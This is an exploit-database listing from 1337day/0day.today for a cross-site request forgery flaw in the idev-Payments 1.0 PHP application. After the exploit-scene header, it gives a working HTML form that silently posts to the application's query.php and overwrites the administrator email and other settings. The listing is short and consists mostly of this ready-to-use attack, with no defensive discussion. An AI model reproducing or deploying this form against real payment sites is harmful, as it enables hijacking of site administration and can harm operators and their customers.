idev-Payments 1.0 CSRF Vulnerability

2012-04-04T00:00:00
ID 1337DAY-ID-17958
Type zdt
Reporter Jonturk75
Modified 2012-04-04T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: idev-Payments 1.0 CSRF
# Author: Jonturk75
# Vendor or Software Link: http://idevspot.com/
# Category::  webapps
# Demo : http://idevspot.com/demos/idev-payments/admin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com


<FORM NAME="form1" METHOD="post" ACTION="../library/query.php">
<input name="EMAIL" class="textarea100" value="[email protected]" type="hidden">
<input name="SIGNATURE" class="textarea100" value="idev-Payments 1.0" type="hidden">
<input name="AFFID" class="textarea100" value="" type="hidden">
<select name="HELPBOX" size="1"><option> </option><option selected>Show</option><option>Hide</option></select>
<input name="Submit" value="Submit" type="submit">
</form>



#  0day.today [2018-03-02]  #